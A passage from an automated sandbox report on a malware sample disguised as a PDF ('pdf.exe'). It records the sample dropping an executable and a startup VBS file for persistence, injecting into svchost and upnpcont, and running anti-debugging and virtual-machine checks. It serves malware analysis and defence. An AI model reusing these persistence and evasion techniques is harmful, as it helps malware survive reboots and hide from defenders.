                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035E01E LoadLibraryA,GetProcAddress,0_2_0035E01E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036C09E push esi; ret 0_2_0036C0A0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036C187 push edi; ret 0_2_0036C189
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003AC8BC push esi; ret 0_2_003AC8BE
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00366B05 push ecx; ret 0_2_00366B18
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038B2B1 push FFFFFF8Bh; iretd 0_2_0038B2B3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036BDAA push edi; ret 0_2_0036BDAC
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036BEC3 push esi; ret 0_2_0036BEC5
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0C09E push esi; ret 1_2_00D0C0A0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0C187 push edi; ret 1_2_00D0C189
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5C498 push ds; iretd 1_2_00D5C4A6
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5C444 push ds; iretd 1_2_00D5C452
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D4C8BC push esi; ret 1_2_00D4C8BE
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF2857 push ds; iretd 1_2_00CF285A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF2959 push 2700CF1Fh; iretd 1_2_00CF2971
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF2919 push ds; iretd 1_2_00CF291A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF2915 push ds; iretd 1_2_00CF2916
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CF2910 push ebx; iretd 1_2_00CF2911
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5AA42 push cs; iretd 1_2_00D5AA48
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5AA62 push cs; iretd 1_2_00D5AA68
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5AA6F push cs; iretd 1_2_00D5AA74
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5AA6B push cs; iretd 1_2_00D5AA6C
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D5AA3F push cs; iretd 1_2_00D5AA40
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D06B05 push ecx; ret 1_2_00D06B18
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2B2B1 push FFFFFF8Bh; iretd 1_2_00D2B2B3
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFF25C push 8C00CFF2h; iretd 1_2_00CFF261
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0BDAA push edi; ret 1_2_00D0BDAC
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D0BEC3 push esi; ret 1_2_00D0BEC5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032D0 push eax; ret 2_2_004032D2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041847D push esi; retf 2_2_0041847E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418496 push esi; ret 2_2_00418497
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041450B push edi; iretd 2_2_0041450F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeFile created: C:\Users\user\AppData\Local\retrofit\cunila.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbsJump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003A8111
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0035EB42
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00D48111
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00CFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00CFEB42
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0036123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0036123A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeAPI/Special instruction interceptor: Address: 147EFD4
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeAPI/Special instruction interceptor: Address: 1984014
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                    Source: C:\Windows\SysWOW64\upnpcont.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeWindow / User API: threadDelayed 4066Jump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeWindow / User API: threadDelayed 5907Jump to behavior
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeEvaded block: after key decisiongraph_0-94114
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeEvaded block: after key decisiongraph_0-93140
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeEvaded block: after key decision
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeEvaded block: after key decision
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-93585
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeAPI coverage: 4.4 %
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeAPI coverage: 4.7 %
                    Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928Thread sleep count: 4066 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928Thread sleep time: -8132000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928Thread sleep count: 5907 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928Thread sleep time: -11814000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe TID: 7952Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\upnpcont.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00386CA9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003860DD
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003863F9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038EB60
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038F56F FindFirstFileW,FindClose,0_2_0038F56F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038F5FA
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391B2F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391C8A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00391F94
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D26CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00D26CA9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00D260DD
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00D263F9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D2EB60
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00D2F5FA
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2F56F FindFirstFileW,FindClose,1_2_00D2F56F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31B2F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31C8A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D31F94
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0035DDC0
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: wscript.exe, 00000003.00000002.1965343088.000002658DAC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: wscript.exe, 00000003.00000002.1965343088.000002658DAC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|I
                    Source: cunila.exe, 00000004.00000003.1965298484.00000000019D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe4M
                    Source: cunila.exe, 00000001.00000003.1840821630.0000000001471000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3083332902.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: firefox.exe, 0000000D.00000002.2629190174.00000254BCB4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-92917
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\upnpcont.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417DD3 LdrLoadDll,2_2_00417DD3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00396AAF BlockInput,0_2_00396AAF
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343D19
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00373920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00373920
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0035E01E LoadLibraryA,GetProcAddress,0_2_0035E01E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00CEE688 mov eax, dword ptr fs:[00000030h]0_2_00CEE688
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00CEE628 mov eax, dword ptr fs:[00000030h]0_2_00CEE628
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00CECFD8 mov eax, dword ptr fs:[00000030h]0_2_00CECFD8
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_0147F240 mov eax, dword ptr fs:[00000030h]1_2_0147F240
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_0147F2A0 mov eax, dword ptr fs:[00000030h]1_2_0147F2A0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_0147DBF0 mov eax, dword ptr fs:[00000030h]1_2_0147DBF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]2_2_0330634F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
